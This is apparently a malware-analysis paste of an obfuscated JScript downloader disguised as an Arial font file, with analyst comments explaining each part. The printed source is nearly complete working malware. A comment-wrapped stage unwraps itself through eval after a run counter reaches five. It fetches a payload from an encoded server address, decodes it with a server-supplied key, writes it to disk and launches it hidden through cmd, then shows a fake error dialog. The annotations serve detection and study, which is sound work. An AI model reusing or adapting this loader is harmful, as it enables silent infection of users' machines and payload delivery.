MalwareBreakdown

Obfuscated ArialFont JScript file

Jun 5th, 2017
  // [analyst note] Live (un-commented) prologue: creates a FileSystemObject and probes for
  // two oddly named .txt files before anything else runs.
  // NOTE(review): FileExists is given a bare relative name (resolved against the current
  // directory), while DeleteFile targets fcdedcaefdbdad + '/' + name. fcdedcaefdbdad is only
  // assigned on the last line of this run (var hoisting leaves it undefined until then), so
  // the delete path would begin with "undefined/". These branches look like filler rather
  // than working cleanup - confirm in an isolated sandbox.
  1.     var bfefbdcfdfcdc = new ActiveXObject('Scripting.FileSystemObject');
  2.    
  3.     if(bfefbdcfdfcdc.FileExists('cdcaabebebaffca.txt')){
  4.         bfefbdcfdfcdc.DeleteFile(fcdedcaefdbdad + '/' + 'cdcaabebebaffca.txt');
  // The same meaningless string is echoed three times; no later code reads it.
  5.         Wscript.echo('efefbccbda');
  6.        
  7.         Wscript.echo('efefbccbda');
  8.        
  9.         Wscript.echo('efefbccbda');
  10.     }
  11.     if(bfefbdcfdfcdc.FileExists('cdcaabebebaffcaas.txt'))bfefbdcfdfcdc.DeleteFile(fcdedcaefdbdad + '/' + 'cdcaabebebaffcaas.txt');
  12.    
  // GetSpecialFolder(2) is the FileSystemObject constant for the temporary folder. The
  // counter and marker files handled further down the script are all built from this path,
  // so the temp directory is where a responder should look for its state files.
  13.     var fcdedcaefdbdad = bfefbdcfdfcdc.GetSpecialFolder(2);
  14.  
  15.  
  16. /*
  17.  
  // Declarations for the dormant stage. Later in this commented region ffecbebbafcc receives
  // the de-keyed hex text from the server response, fdbaeeabf the byte values parsed from it,
  // and badbffbeabd the string built from those bytes.
  18. var ffecbebbafcc = '';
  19. var fdbaeeabf = [];
  20. var badbffbeabd;
  21.  
  // Hex-to-text helper: converts the argument to a string, walks it two characters at a
  // time, parses each pair as base 16 and appends the corresponding character.
  // ceecacabbad calls this as its final step, so every hidden string is hex underneath.
  22. function fdebeccfdaf(acfddfc) {
  23.     var fdebabbbacf = acfddfc.toString();
  24.     var aedfcafcccfdad = '';
  25.     for (var eadccadbceeaad = 0; eadccadbceeaad < fdebabbbacf.length; eadccadbceeaad += 2)
  26.         aedfcafcccfdad += String.fromCharCode(parseInt(fdebabbbacf.substr(eadccadbceeaad, 2), 16));
  27.     return aedfcafcccfdad;
  28. }
  29.  
  // Numeric test: true when parseFloat yields a number and the value is finite.
  // bcddfeaffacac uses it on single characters to pick out the digits of the payload text.
  30. function aaafeeffdaf(babbadebba) {
  31.   return !isNaN(parseFloat(babbadebba)) && isFinite(babbadebba);
  32. }
  33.  
  34.  
  35.  
  // Digit rotation: subtracts 1 from the first argument daedfadcac times, wrapping from
  // below 0 back to 9. The caller passes a one-character string; the subtraction coerces
  // it to a number. Effectively (digit - key) modulo 10 for a single decimal digit.
  // NOTE(review): the loop counter i is never declared with var, so it is an implicit global.
  36. function ddcdafcdac(beeecdadcceacbeeecdadcceac,daedfadcac){
  37.    
  38.    
  39.     for(i=daedfadcac;i>0;i--){
  40.        
  41.         beeecdadcceacbeeecdadcceac = beeecdadcceacbeeecdadcceac - 1;
  42.        
  43.         if(beeecdadcceacbeeecdadcceac<0)beeecdadcceacbeeecdadcceac = 9;
  44.        
  45.     }
  46.  
  47.     return beeecdadcceacbeeecdadcceac;
  48.    
  49.  
  50. }
  51.  
  52.  
  53.  
  54.  
  // Payload de-keying: copies the input string character by character. Every character that
  // tests as numeric is rotated down by the next entry of the key array (second argument);
  // all other characters pass through unchanged. The key position advances only on digits
  // and resets to 0 once it exceeds 10, so at most eleven key entries (indexes 0..10) are used.
  // At the call site the key array comes from the first part of the server response, which
  // means the payload text cannot be recovered from this script alone.
  55. function bcddfeaffacac(sstrstrtbeeecdadcceacr,faeacdaebdbcd){
  56.    
  57.    
  58.    
  59.     var fbdefbadcfecfe = sstrstrtbeeecdadcceacr.length;
  60.    
  61.     var aefacbbaebbffafbe = '';
  62.    
  63.    
  // Index into the key array.
  64.     var cebffeccae = 0;
  65.    
  66.     for(var bbffbdbcfed=0;bbffbdbcfed<fbdefbadcfecfe;bbffbdbcfed++){
  67.        
  68.         if(cebffeccae>10)cebffeccae=0;
  69.        
  70.        
  71.         if(aaafeeffdaf(sstrstrtbeeecdadcceacr.charAt(bbffbdbcfed))){
  72.        
  73.             aefacbbaebbffafbe = aefacbbaebbffafbe + ddcdafcdac(sstrstrtbeeecdadcceacr.charAt(bbffbdbcfed),faeacdaebdbcd[cebffeccae]);
  74.             cebffeccae++;
  75.            
  76.         }else{
  77.            
  78.             aefacbbaebbffafbe = aefacbbaebbffafbe + sstrstrtbeeecdadcceacr.charAt(bbffbdbcfed);
  79.            
  80.         }
  81.        
  82.     }
  83.    
  84.     return aefacbbaebbffafbe;
  85. }
  86.  
  87.  
  // String decoder used for every hidden literal in the dormant stage. Each input character
  // is looked up in a fixed shuffled alphabet, its index is moved back by the shift given as
  // second argument, and the character at the new index is emitted. The resulting text is
  // then handed to fdebeccfdaf, i.e. the substitution layer hides a hex string.
  // Because the alphabet and shift are embedded here, the literals can be recovered
  // statically by an analyst without executing the rest of the script.
  88. function ceecacabbad(feccdeaddccda,fdcedeccfccb){
  89.    
  90.     var eaaebfdfeedef = "^DQqM1.c8OnIbg&7:yad2BC!LFPR0l(Ux9SkKpof5G+N4@-zhVw,%3isuvjrt*;WXJAeH)_$ZT6YmE";
  91.     var baefbffba = "";
  92.  
  // Highest valid index in the alphabet.
  93.     var addebdcfcfcccc = eaaebfdfeedef.length-1;
  94.  
  95.     var size = feccdeaddccda.length;
  96.  
  97.    
  98.    
  99.     for(var eacecadafbf = 0; eacecadafbf<size ; eacecadafbf++){
  100.        
  // indexOf returns -1 for a character that is not in the alphabet; that case also ends up
  // in the negative-index branch below.
  101.         var facabcbfcddccbb = eaaebfdfeedef.indexOf(feccdeaddccda.charAt(eacecadafbf));
  102.        
  103.         var eebfdceff = facabcbfcddccbb - fdcedeccfccb;
  104.        
  // Wrap-around for indexes that fall off the front of the alphabet, with a special-case
  // correction when the wrapped index equals (last index - 1).
  105.         if(eebfdceff<0){
  106.            
  107.             eebfdceff = addebdcfcfcccc - Math.abs(eebfdceff);
  108.            
  109.             var daedfadcac = addebdcfcfcccc - 1;   
  110.        
  111.             if(eebfdceff==daedfadcac)eebfdceff = eebfdceff + fdcedeccfccb;
  112.            
  113.         }
  114.        
  115.        
  116.         baefbffba = baefbffba + eaaebfdfeedef.charAt(eebfdceff);
  117.     }
  118.    
  119.     return fdebeccfdaf(baefbffba);
  120. }
  121.  
  122.  
  // [analyst note] Download stage (dormant until the comment wrapper is stripped at run time).
  // Every ActiveX ProgID here is stored encoded and only appears in clear after ceecacabbad
  // runs. The members used on the results (GetSpecialFolder; SpecialFolders;
  // open, send, responseText, Status) are consistent with a file-system object, a shell
  // object and an HTTP request object respectively - confirm by decoding offline.
  // Hand-tracing the first bytes of the repeated long literal gives "script".
  123. var addcfeccbca = new ActiveXObject(ceecacabbad(":iYi:BYS:l:@YSY^Y:B^YYYSY!YG:i:S:i:@YGYQYPYBYeYGYi:@",1));
  124. var fcdedcaefdbdad = addcfeccbca.GetSpecialFolder(2);
  125.  
  126.  
  // Second base directory, obtained from SpecialFolders with an encoded folder name. The
  // downloaded file is saved and launched from this directory, not from the temp folder.
  127. var addcfeccbcaDeck = new ActiveXObject(ceecacabbad('G:GiYi:BYS:l:@B^:iYOYGY!Y!',1));
  128. var debbcfaaaaffcdbed = addcfeccbcaDeck.SpecialFolders(ceecacabbad('@@YG:iYC:@YP:l',1));
  129. var fcdedcaefdbdadd = debbcfaaaaffcdbed;
  130.  
  131. var cbebdeebffcfcdbeb = new ActiveXObject(ceecacabbad(":iYi:BYS:l:@YSY^Y:B^YYYSY!YG:i:S:i:@YGYQYPYBYeYGYi:@",1));    
  132.  
  133.  
  // Request object used by the loop below.
  134. var efdbceecefe = new ActiveXObject(ceecacabbad('@Q:i:OYQY!iBB^GO@Q@!@OG@G@GlB^iiB^il',1));
  135.  
  136.  
  // bdadaffecae counts attempts; afcdafafddad indexes the target list.
  137. var bdadaffecae = 0;
  138.  
  139. var afcdafafddad = 0;
  140.  
  // Encoded list of request targets (a single entry in this sample). It is passed as the
  // address argument of open() below, so this literal is the network indicator to decode.
  141. var linksssee = ['YO:@:@:lieBPBP:iYPYBYBYG:BYSY^YYYPB^YiYPYQBPY:Y.:@YGB^:lYO:l'];
  142.  
  // Retry loop with no exit other than success: it only breaks on Status 200 with a body
  // containing '|||'. Failures rotate to the next list entry (wrapping to 0) after 1 second.
  // Detection hooks visible here: a script host issuing synchronous requests whose query
  // string is "?ff" followed by an incrementing integer, and a response containing "|||".
  143. while(true){
  144.    
  145.     bdadaffecae++;
  146.    
  147.     if(linksssee[afcdafafddad] == undefined)afcdafafddad = 0;
  148.    
  149.    
  150.     try {
  151.    
  // The first decoder call passes a third argument, which the two-parameter decoder ignores.
  // The final false makes the request synchronous.
  152.         efdbceecefe.open(ceecacabbad('@:@GG@',1,1), ceecacabbad(linksssee[afcdafafddad],1)+'?ff'+bdadaffecae, false);
  153.         efdbceecefe.send();
  154.    
  155.  
  156.     } catch(e) {
  157.  
  158.         afcdafafddad++;
  159.         WScript.Sleep(1000);
  160.         continue;
  161.  
  162.     }
  163.    
  164.  
  165.     var feabfebecfd = efdbceecefe.responseText.indexOf('|||');
  166.  
  167.     if( feabfebecfd == -1 ){
  168.        
  169.         afcdafafddad++;
  170.         WScript.Sleep(1000);
  171.         continue;
  172.        
  173.     }
  174.  
  175.    
  176.     if(efdbceecefe.Status == 200)break;
  177. }
  178.  
  // Response layout as consumed here: part [0] is a key list, part [1] is the payload text.
  // Both separators are stored encoded; the plain '|||' test above suggests the outer one is
  // that same three-character string - confirm by decoding.
  179.    var adfeedadcaedff = efdbceecefe.responseText;
  180.    
  181.     adfeedadcaedff = adfeedadcaedff.split(ceecacabbad(':!:!:!',1));
  182.  
  183.     var bfdfdcdcebbbaed = adfeedadcaedff[0].split(ceecacabbad('B!',1));
  184.    
  185.  
  186.    
  // De-key the digits of the payload text with the server-supplied key list.
  187. ffecbebbafcc = bcddfeaffacac(adfeedadcaedff[1],bfdfdcdcebbbaed);
  188.    
  189. var fddcebbfafaooo = new ActiveXObject(ceecacabbad(":iYi:BYS:l:@YSY^Y:B^YYYSY!YG:i:S:i:@YGYQYPYBYeYGYi:@",1));
  190.    
  191. var  fdbaeeabf = [];
  192.  
  193.  
  194.  
  // Parse the de-keyed text as hex pairs into byte values, then build one string from them.
  195. for(var bbffbdbcfed=0; bbffbdbcfed< ffecbebbafcc.length-1; bbffbdbcfed+=2){
  196.     fdbaeeabf.push(parseInt(ffecbebbafcc.substr(bbffbdbcfed, 2), 16));
  197. }
  198.  
  199. badbffbeabd = String.fromCharCode.apply(String, fdbaeeabf);
  200.  
  201.  
  // Writes the decoded payload string to disk. The object's ProgID is encoded; the members
  // used (Type, Charset, Open, WriteText, SaveToFile, Close) match an ADODB-style stream -
  // confirm by decoding. Type 2 selects text mode and the ISO-8859-1 charset maps each
  // character code to a single byte, so the byte values built by the caller land on disk
  // unchanged. SaveToFile option 2 overwrites an existing file.
  // The target is fcdedcaefdbdadd (the SpecialFolders path) plus an encoded file name; the
  // same encoded name is reused by the Run calls that follow this function.
  202. function cceaafdcfbcdcb(abafaabfdcfedc){
  203.  
  204.  
  205. var bcafececaae = abafaabfdcfedc;
  206. var ddbeeecedcdc = new ActiveXObject(ceecacabbad('@.@@@P@@@BB^Gi:@:BYGY.YQ',1));
  207. ddbeeecedcdc.Type = 2;
  208. ddbeeecedcdc.Charset = 'ISO-8859-1';
  209. ddbeeecedcdc.Open();
  210. ddbeeecedcdc.WriteText(bcafececaae);
  211. ddbeeecedcdc.SaveToFile(fcdedcaefdbdadd + '/' +ceecacabbad('iiiYY@i@B^YG:OYG',1), 2);
  212. ddbeeecedcdc.Close();
  213.  
  214. }
  215.  
  216.  
  217.  
  218.  
  219.  
  // [analyst note] Final step of the dormant stage: drop the payload, launch it, show a
  // decoy error and remove the state files.
  220. cceaafdcfbcdcb(badbffbeabd);
  221.  
  222.  
  223.    var fddcebbfafa = new ActiveXObject(ceecacabbad(":iYi:BYS:l:@YSY^Y:B^YYYSY!YG:i:S:i:@YGYQYPYBYeYGYi:@",1));
  224.    
  225.  
  // Remember whether the activation marker exists in the temp folder so it can be deleted below.
  226.     var abaffdddbeafbacb = fddcebbfafa.FileExists(fcdedcaefdbdad + '/' +'cecabddbfacbdb.txt');
  227.    
  228.     var bedbcafcabb = new ActiveXObject(ceecacabbad('G:GiYi:BYS:l:@B^:iYOYGY!Y!',1));
  229.            
  230.        
  231.    
  232.  
  // Three Run calls, each with window style 0 (hidden) and no wait for completion. All share
  // one encoded prefix followed by the dropped file's path; the first two also insert an
  // encoded fragment before the path and append the same encoded suffix after it.
  // Hand-tracing the first bytes of the shared prefix gives "cmd." - confirm by decoding.
  // For detection this implies a script host spawning a command interpreter that references
  // a file in the SpecialFolders directory.
  233. bedbcafcabb.Run(ceecacabbad('YiYQY@B^YG:OYGBlBPYiBl',1) + ceecacabbad('BBYGYiYOYPBlGCGeYPY^YGG@:BY.Y^:iYYYG:BGQi^Bl',1)+ fcdedcaefdbdadd +'\\'+ ceecacabbad('iiiYY@i@B^YG:OYG',1)+ceecacabbad('ieGeYPY^YGB^@SY@YGY^:@YSYYYSYG:BBB',1),0,false);
  234.  
  235. bedbcafcabb.Run(ceecacabbad('YiYQY@B^YG:OYGBlBPYiBl',1) + ceecacabbad('BBYGYiYOYPBlGeYPY^YG@SY@iQiBi^i^Bl',1)+ fcdedcaefdbdadd +'\\'+ ceecacabbad('iiiYY@i@B^YG:OYG',1)+ceecacabbad('ieGeYPY^YGB^@SY@YGY^:@YSYYYSYG:BBB',1),0,false);
  236.  
  237.    
  238. bedbcafcabb.Run(ceecacabbad('YiYQY@B^YG:OYGBlBPYiBl',1)+ fcdedcaefdbdadd +'\\'+ ceecacabbad('iiiYY@i@B^YG:OYG',1),0,false);
  239.  
  240.  
  241.    
  242.    
  // Decoy: a fabricated error dialog shown after the payload has already been started, so
  // the user believes the script simply failed. The exact text is a usable hunting string.
  243.     WScript.echo('Runtime Error 0x48940 (.QBT) Library not located on the system, please use x64 system.');
  244.  
  // Remove the run counter and, if it was present, the activation marker from the temp folder.
  245.     fddcebbfafa.DeleteFile(fcdedcaefdbdad + '/' +'fbdefbadcfecfeer.txt');
  246.     if(abaffdddbeafbacb)fddcebbfafa.DeleteFile(fcdedcaefdbdad + '/' +'cecabddbfacbdb.txt');
  247.    
  // Quit ends the host here, so the live trailer of the file does not run again after this.
  248.     WScript.Quit();
  249.    
  250.     */
  251.    
  // Reads a whole text file and returns its contents: opens the given path with
  // OpenTextFile in mode 1 (read), calls ReadAll, closes the handle.
  // The only caller in this listing passes WScript.ScriptFullName, i.e. the script reads
  // its own source so that it can be modified in memory and handed to eval.
  252.     function ceaeaaecefa(fcbbdfd){
  253.        
  254.  
  255.         var dfedaddbdfeed = new ActiveXObject('Scripting.FileSystemObject');
  256.        
  257.         var ecefcbacedebfda = fcbbdfd;
  258.        
  259.         var bcbdbacebfbeecff = ecefcbacedebfda;
  260.    
  261.         var fadefbfedbfcaa = dfedaddbdfeed.OpenTextFile(bcbdbacebfbeecff, 1);
  262.        
  263.         var fffbcaecdacedf =  fadefbfedbfcaa.ReadAll();
  264.                
  265.         fadefbfedbfcaa.Close();
  266.        
  267.         return fffbcaecdacedf;
  268.        
  269.     }
  270.  
  271.    
  // [analyst note] Staged self-activation. The real logic of this file sits inside one large
  // block comment; this live trailer decides when to strip the comment wrapper from an
  // in-memory copy of the source and eval it. State is kept in the temp folder:
  //   fbdefbadcfecfeer.txt  - pass counter (read, incremented, rewritten on every pass)
  //   cadabcdeabceaded.txt  - staging file written when the counter equals 4
  //   cecabddbfacbdb.txt    - activation marker, created by renaming the staging file at 5
  // Those three file names are host indicators for responders.
  // NOTE(review): the unmodified source is passed to eval on every pass, so as written a
  // single launch appears to re-enter this trailer recursively until the counter reaches 5;
  // a scanner that only inspects the first pass sees nothing but file bookkeeping.
  272.    var fbdefbadcfecfe = 0;
  273.    var abaffdddbeafbacb = bfefbdcfdfcdc.FileExists(fcdedcaefdbdad + '/' + 'fbdefbadcfecfeer.txt');
  274.    if(abaffdddbeafbacb == true){
  275.     var fcbbfeadfdadb = bfefbdcfdfcdc.OpenTextFile(fcdedcaefdbdad + '/' + 'fbdefbadcfecfeer.txt', 1,1);
  276.     fbdefbadcfecfe = fcbbfeadfdadb.ReadAll();
  277.             fcbbfeadfdadb.Close();
  278.    }
  // parseInt is called without a radix on the text read back from the counter file.
  279.     fbdefbadcfecfe = parseInt(fbdefbadcfecfe) +1;
  280.    
  281. if(bfefbdcfdfcdc.FileExists('cdcaabebebaffc3.txt'))bfefbdcfdfcdc.DeleteFile(fcdedcaefdbdad + '/' + 'cdcaabebebaffc3.txt');
  282.    
  // Mode 2 with create=1: overwrite the counter file with the new value.
  283.     fcbbfeadfdadb = bfefbdcfdfcdc.OpenTextFile(fcdedcaefdbdad + '/' + 'fbdefbadcfecfeer.txt', 2,1);
  284.    
  285.     fcbbfeadfdadb.WriteLine(fbdefbadcfecfe);
  286.     fcbbfeadfdadb.Close();
  287.    
  // Load this script's own text from disk.
  288.     var caecebcfccacab = WScript.ScriptFullName;
  289.     var feeddabdbddfb = ceaeaaecefa(caecebcfccacab);
  290.    
  291.     if(bfefbdcfdfcdc.FileExists('cdcaabebebaffc.txt'))bfefbdcfdfcdc.DeleteFile(fcdedcaefdbdad + '/' + 'cdcaabebebaffc.txt');
  292.    
  // Pass 4: create the staging file.
  293.     if(fbdefbadcfecfe==4){
  294.        
  295.        
  296.         fcbbfeadfdadb = bfefbdcfdfcdc.OpenTextFile(fcdedcaefdbdad + '/' + 'cadabcdeabceaded.txt', 2,1);
  297.        
  298.         if(bfefbdcfdfcdc.FileExists('cdcaabebebaffca.txt'))bfefbdcfdfcdc.DeleteFile(fcdedcaefdbdad + '/' + 'cdcaabebebaffca.txt');
  299.        
  300.         fcbbfeadfdadb.WriteLine(fbdefbadcfecfe);
  301.         fcbbfeadfdadb.Close();
  302.        
  303.     }
  304.    
  // Pass 5: rename the staging file to the activation marker and unwrap the dormant stage.
  // The repeated FileExists and DeleteFile lines on the same names add nothing functionally.
  305.     if(fbdefbadcfecfe==5){
  306.        
  307.         if(bfefbdcfdfcdc.FileExists(fcdedcaefdbdad + '/' + 'fadaeabefaac.jpg'))bfefbdcfdfcdc.DeleteFile(fcdedcaefdbdad + '/' + 'fadaeabefaac.jpg');
  308.         bfefbdcfdfcdc.MoveFile(fcdedcaefdbdad + '/' + 'cadabcdeabceaded.txt', fcdedcaefdbdad + '/' + 'cecabddbfacbdb.txt');
  309.         if(bfefbdcfdfcdc.FileExists(fcdedcaefdbdad + '/' + 'fcefbfaef.txt'))bfefbdcfdfcdc.DeleteFile(fcdedcaefdbdad + '/' + 'fcefbfaef.txt');
  310.         if(bfefbdcfdfcdc.FileExists(fcdedcaefdbdad + '/' + 'fcefbfaef.txt'))bfefbdcfdfcdc.DeleteFile(fcdedcaefdbdad + '/' + 'fcefbfaef.txt');
  311.         if(bfefbdcfdfcdc.FileExists(fcdedcaefdbdad + '/' + 'fcefbfaef.txt'))bfefbdcfdfcdc.DeleteFile(fcdedcaefdbdad + '/' + 'fcefbfaef.txt');
  312.        
  313.         if(bfefbdcfdfcdc.FileExists(fcdedcaefdbdad + '/' + 'fcefbfaef.txt'))bfefbdcfdfcdc.DeleteFile(fcdedcaefdbdad + '/' + 'fcefbfaef.txt');
  314.        
  315.  
  316.         if(bfefbdcfdfcdc.FileExists('cdcaabebebaffca.txt'))bfefbdcfdfcdc.DeleteFile(fcdedcaefdbdad + '/' + 'cdcaabebebaffca.txt');
  317.    
  // String replace with a string pattern removes only the first match per call: this drops
  // the first block-comment opener, the first closer, and up to five occurrences of a fixed
  // marker string from the in-memory copy. The file on disk is left unchanged, so the
  // sample always looks dormant to anything that only reads it from disk.
  318.         feeddabdbddfb = feeddabdbddfb.replace('/*','').replace('*/', '').replace('ebdcedddfdcddccae', '').replace('ebdcedddfdcddccae', '').replace('ebdcedddfdcddccae', '').replace('ebdcedddfdcddccae', '').replace('ebdcedddfdcddccae', '');
  319.     }
  320.    
  321.    
  322.  
  323.     var abaffdddbeafbacb = bfefbdcfdfcdc.FileExists(fcdedcaefdbdad + '/' + 'cecabddbfacbdb.txt');
  324.  
  // eval of text read from the script's own file: executed once here when the activation
  // marker exists, and once more unconditionally on the last line.
  // For static analysis, treat the commented region as live code.
  325.      if(abaffdddbeafbacb == true){
  326.        
  327.        eval(feeddabdbddfb);
  328.        
  329.     }
  330.  
  331.    
  332.     eval(feeddabdbddfb);